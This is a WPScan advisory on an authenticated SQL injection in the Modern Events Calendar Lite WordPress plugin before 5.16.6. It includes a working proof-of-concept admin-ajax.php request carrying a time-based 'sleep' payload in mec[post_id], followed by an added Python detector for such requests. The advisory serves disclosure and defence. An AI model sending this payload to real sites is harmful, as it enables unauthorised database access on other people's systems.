wpvulndb, Khanh, WPVDB-ID:26819680-22A8-4348-B63D-DC52C0D50ED0
Jan 29, 2021 - 12:00 a.m.

Modern Events Calendar Lite < 5.16.6 - Authenticated SQL Injection

wpscan.com

The plugin did not sanitise the mec[post_id] POST parameter in the mec_fes_form AJAX action when logged in as an author+, leading to an authenticated SQL Injection issue. If the Frontend Event Submission form is embedded in a public page, then any authenticated user, such as a subscriber, could perform the same SQL Injection.

PoC

https://drive.google.com/file/d/1-2tvODEzr1zLb8CmIGmODe5470_YHsqX/view?usp=sharing

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/wordpress-5.5/wp-admin/post.php?post=407&action=edit
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 73
Connection: close
Cookie: [author+ cookies]

action=mec_fes_form&mec%5bpost_id%5d=1+or+sleep(1)%23&_wpnonce=212479b1e1
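Added example, not part of the WPScan advisory or the plugin's code: a Python check a defender could run over proxied or logged admin-ajax.php POST bodies to flag mec_fes_form requests whose mec[post_id] is not a plain integer. The function name, the integer-only rule for legitimate values and the first and third sample bodies are assumptions constructed for illustration; the second sample is the request body from the PoC above.

```python
import re
from urllib.parse import parse_qs

PARAM = "mec[post_id]"
# Assumption: a legitimate post ID is a plain (optionally negative) integer.
INT_RE = re.compile(r"-?[0-9]{1,20}")


def audit_mec_fes_body(body):
    """Return a list of findings for one urlencoded admin-ajax.php POST body."""
    # parse_qs decodes %5b/%5d to brackets and '+' to a space, as PHP does.
    params = parse_qs(body, keep_blank_values=True)
    if "mec_fes_form" not in params.get("action", []):
        return []  # not the affected AJAX action
    findings = []
    for key, values in params.items():
        if not key.startswith(PARAM):
            continue
        if key != PARAM:
            # e.g. mec[post_id][]: PHP would not hand the plugin a scalar here.
            findings.append(f"non-canonical key {key!r}")
        if len(values) > 1:
            findings.append(f"{key!r} repeated {len(values)} times")
        for value in values:
            if not INT_RE.fullmatch(value):
                findings.append(f"non-integer {key!r} value: {value!r}")
    return findings


# Sample bodies: the first and third are constructed, the second is the PoC body.
BENIGN = "action=mec_fes_form&mec%5bpost_id%5d=407&_wpnonce=0000000000"
POC = "action=mec_fes_form&mec%5bpost_id%5d=1+or+sleep(1)%23&_wpnonce=212479b1e1"
OTHER_ACTION = "action=heartbeat&mec%5bpost_id%5d=abc"

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("poc", POC), ("other", OTHER_ACTION)):
        print(name, audit_mec_fes_body(body))
```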

CPE Name                       Operator   Version
modern-events-calendar-lite    lt         5.16.6